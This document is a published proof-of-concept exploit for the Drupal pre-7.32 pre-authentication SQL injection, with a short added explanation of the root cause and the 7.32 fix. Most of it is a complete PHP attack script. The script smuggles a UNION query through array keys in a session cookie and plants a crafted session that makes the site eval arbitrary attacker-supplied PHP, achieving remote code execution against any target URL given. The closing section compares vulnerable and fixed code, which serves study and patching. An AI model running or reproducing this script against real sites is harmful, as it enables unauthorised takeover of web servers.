Drupal < 7.32 Pre Auth SQL Injection
Source: stefan.horst@sektioneins.de  Author: Horst  Published: 2014-11-05
<?php
//    _____      __   __  _             _______
//   / ___/___  / /__/ /_(_)___  ____  / ____(_)___  _____
//   \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
//  ___/ /  __/ ,< / /_/ / /_/ / / / / /___/ / / / (__  )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <stefan.horst@sektioneins.de>
//        and Stefan Esser <stefan.esser@sektioneins.de>
//

// Taken from a local Drupal 7 tree: user_hash_password() lives in
// password.inc, drupal_random_key() in common.inc.
include 'common.inc';
include 'password.inc';

// set values: uid 0 and an empty name are enough, the injected row only
// has to carry the session payload in its last column
$user_id = 0;
$user_name = '';

// default payload; session_destroy() drops the planted session, die() stops the page
$code_inject = 'phpinfo();session_destroy();die("");';

$url = isset($argv[1])?$argv[1]:'';
$code = isset($argv[2])?$argv[2]:'';

if ($url == '-h') {
      echo "usage:\n";
      echo $argv[0].' $url [$code|$file]'."\n";
      die();
}

// The injection point is the *insecure* SESS cookie, which Drupal only looks
// up in the database when the request itself is HTTPS and mixed-mode
// sessions are enabled ($conf['https'] = TRUE), so plain http targets
// never reach the vulnerable query.
if (empty($url) || strpos($url,'https') === False) {
      echo "please state the cookie url. It works only with https urls.\n";
      die();
}

// second argument: either literal PHP code or a path to a file with PHP code
if (!empty($code)) {
      if (is_file($code)) {
              // strip <?php / <? / ?> tags so the file content can be eval()ed as-is
              $code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));
      } else {
              $code_inject = $code;
      }
}

$code_inject = rtrim($code_inject,';');
$code_inject .= ';session_destroy();die("");';

if (strpos($url, 'www.') === 0) {
      $url = substr($url, 4);
}

// Session payload. drupal_build_form() treats $_SESSION['batch_form_state']
// as a saved form state and rebuilds the form from it: the 'wrapper_callback'
// form_execute_handlers() is invoked with (form, form_state, build_info args),
// i.e. here with $type = array(), so it reads its handler list from the
// '#Array' key and calls array_filter($this_array, 'assert'). assert() then
// evaluates the string stored under 'a', which eval()s the injected code.
$_SESSION = array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
$_SESSION['build_info']['args'][0] = &$_SESSION['string'];

// Drupal derives the session cookie name from $base_url without the scheme,
// so pass the site's base URL without a trailing slash (e.g. https://host or
// https://host/subdir).
list( , $session_name) = explode('://', $url, 2);

// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);

$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();

// Curly braces in the query text would be rewritten by Drupal's {table}
// prefixing, so they are encoded here and restored server-side with
// REPLACE()/CHAR() inside the SELECT.
$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize($_SESSION)));

// UNION row shaped like users.* (16 columns) followed by sessions.* (7 columns);
// the trailing "-- " comments out the rest of Drupal's query.
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- ";

// Array-valued cookie: PHP turns SESSxxx[key]=value into an array, and
// _drupal_session_read() hands that array to the :sid placeholder, whose
// expansion splices the array *keys* into the SQL. The plain [test] entry
// keeps the resulting :sid_test placeholder bound; the S-prefixed secure
// cookie carries an unknown ssid so the lookup falls through to the insecure one.
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;

$ch = curl_init($url);
curl_setopt($ch,CURLOPT_HEADER,True);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
      'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
      'Accept-Language: en-US,en;q=0.5'
));
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
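Added illustration of the root cause the PoC relies on. This is not part of the SektionEins PoC and not Drupal's own code: the two loops are a reduced re-implementation of the placeholder expansion in Drupal 7's DatabaseConnection::expandArguments(), once as shipped before 7.32 and once with the one-line 7.32 fix (array_values()). The query string and the cookie array are constructed to mirror what _drupal_session_read() passes in; the hostile key is shortened to a harmless UNION so the transformation stays readable.

```php
<?php
// Added example (not from the PoC or from Drupal): how an array-valued
// argument turns into SQL text in Drupal 7 before and after 7.32.

// Pre-7.32 behaviour: the array *keys* become part of the placeholder
// names, and those names are pasted straight into the query string.
function expand_arguments_vulnerable($query, array $args) {
    foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = array();
        foreach ($data as $i => $value) {              // $i is attacker-controlled
            $new_keys[$key . '_' . $i] = $value;
        }
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
        unset($args[$key]);
        $args += $new_keys;
    }
    return array($query, $args);
}

// 7.32 fix: array_values() renumbers the keys 0,1,2,... so only integers
// ever reach a placeholder name; the original keys survive only as values.
function expand_arguments_fixed($query, array $args) {
    foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = array();
        foreach (array_values($data) as $i => $value) { // $i is now 0,1,2,...
            $new_keys[$key . '_' . $i] = $value;
        }
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
        unset($args[$key]);
        $args += $new_keys;
    }
    return array($query, $args);
}

// Constructed input: the insecure-session lookup from _drupal_session_read()
// and the array PHP builds from "SESSxxx[test+UNION...]=sid; SESSxxx[test]=sid".
$query  = "SELECT u.*, s.* FROM {users} u INNER JOIN {sessions} s ON u.uid = s.uid WHERE s.sid = :sid AND s.ssid = ''";
$cookie = array(
    'test UNION SELECT 1 -- ' => 'sid-value',   // hostile key (constructed, shortened)
    'test'                    => 'sid-value',   // keeps :sid_test bound
);

list($vuln_query, $vuln_args) = expand_arguments_vulnerable($query, array(':sid' => $cookie));
echo "vulnerable: ", $vuln_query, "\n";
echo "  bound:    ", implode(' | ', array_keys($vuln_args)), "\n";

list($fixed_query, $fixed_args) = expand_arguments_fixed($query, array(':sid' => $cookie));
echo "fixed:      ", $fixed_query, "\n";
echo "  bound:    ", implode(' | ', array_keys($fixed_args)), "\n";
```

Run it with `php expand.php`. The vulnerable loop rewrites the WHERE clause to `s.sid = :sid_test UNION SELECT 1 -- , :sid_test AND s.ssid = ''`: everything after `--` is a comment, the attacker's SELECT is unioned into the session lookup, and `:sid_test` is still a bound name, which is why the PoC sends the plain `[test]` entry alongside the hostile one. The fixed loop produces only `:sid_0, :sid_1`, so the hostile key never reaches the SQL text; with a non-IN query like this one the result is a syntax error rather than an injected row.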

 